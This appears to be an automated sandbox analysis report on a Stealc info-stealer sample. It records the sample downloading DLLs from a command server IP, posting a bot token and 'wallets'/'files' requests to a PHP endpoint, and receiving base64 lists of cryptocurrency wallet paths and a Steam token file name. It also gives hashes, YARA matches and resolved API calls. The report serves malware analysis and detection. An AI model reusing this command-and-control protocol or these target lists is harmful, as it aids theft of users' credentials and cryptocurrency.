Oct 25, 2024 05:21:14.113475084 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 25, 2024 05:21:14.474564075 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 25, 2024 05:21:14.755960941 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 25, 2024 05:21:15.910124063 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 25, 2024 05:21:16.190346003 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 25, 2024 05:21:16.395973921 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 25, 2024 05:21:16.675957918 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 25, 2024 05:21:17.263565063 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIIEGHDGDBFIDGHDAF Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 25, 2024 05:21:18.062882900 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:18.141117096 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 2d 2d 0d 0a Data Ascii: ------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="message"wallets------DHDBGHCBAEGCBFHJEBFI--
Oct 25, 2024 05:21:18.423449993 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:18 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 25, 2024 05:21:18.425611019 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBA Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"files------BGDAAEHDHIIJKECBKEBA--
Oct 25, 2024 05:21:18.708187103 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:18.719177008 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file"------IJEBKKEGDBFIIEBFHIEH--
Oct 25, 2024 05:21:19.500777960 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:19.525682926 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIE Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="message"ybncbhylepme------KKFCAAKFBAEHJJJJDHIE--
Oct 25, 2024 05:21:19.815174103 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:19 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2398 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Oct 25, 2024 05:21:19.817483902 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IEGCBFHJDHJJKFIDBGIJ--
Oct 25, 2024 05:21:20.595556974 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	23:20:59
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xbe0000
File size:	1'868'800 bytes
MD5 hash:	4BC4838890F52B86E8595449E053C634
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1710578574.0000000005570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 00BF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01732368), ref: 00BF98A1
GetProcAddress.KERNEL32(74DD0000,01732218), ref: 00BF98BA
GetProcAddress.KERNEL32(74DD0000,01732428), ref: 00BF98D2
GetProcAddress.KERNEL32(74DD0000,017324A0), ref: 00BF98EA
GetProcAddress.KERNEL32(74DD0000,01732470), ref: 00BF9903
GetProcAddress.KERNEL32(74DD0000,01739230), ref: 00BF991B
GetProcAddress.KERNEL32(74DD0000,017258A8), ref: 00BF9933
GetProcAddress.KERNEL32(74DD0000,01725A48), ref: 00BF994C
GetProcAddress.KERNEL32(74DD0000,01732380), ref: 00BF9964
GetProcAddress.KERNEL32(74DD0000,01732260), ref: 00BF997C
GetProcAddress.KERNEL32(74DD0000,017322D8), ref: 00BF9995
GetProcAddress.KERNEL32(74DD0000,01732440), ref: 00BF99AD
GetProcAddress.KERNEL32(74DD0000,01725748), ref: 00BF99C5
GetProcAddress.KERNEL32(74DD0000,01732458), ref: 00BF99DE
GetProcAddress.KERNEL32(74DD0000,017322F0), ref: 00BF99F6
GetProcAddress.KERNEL32(74DD0000,01725948), ref: 00BF9A0E
GetProcAddress.KERNEL32(74DD0000,01732308), ref: 00BF9A27
GetProcAddress.KERNEL32(74DD0000,01732338), ref: 00BF9A3F
GetProcAddress.KERNEL32(74DD0000,01725768), ref: 00BF9A57
GetProcAddress.KERNEL32(74DD0000,017324B8), ref: 00BF9A70
GetProcAddress.KERNEL32(74DD0000,01725A68), ref: 00BF9A88
LoadLibraryA.KERNEL32(017325C0,?,00BF6A00), ref: 00BF9A9A
LoadLibraryA.KERNEL32(01732500,?,00BF6A00), ref: 00BF9AAB
LoadLibraryA.KERNEL32(01732560,?,00BF6A00), ref: 00BF9ABD
LoadLibraryA.KERNEL32(01732590,?,00BF6A00), ref: 00BF9ACF
LoadLibraryA.KERNEL32(01732518,?,00BF6A00), ref: 00BF9AE0
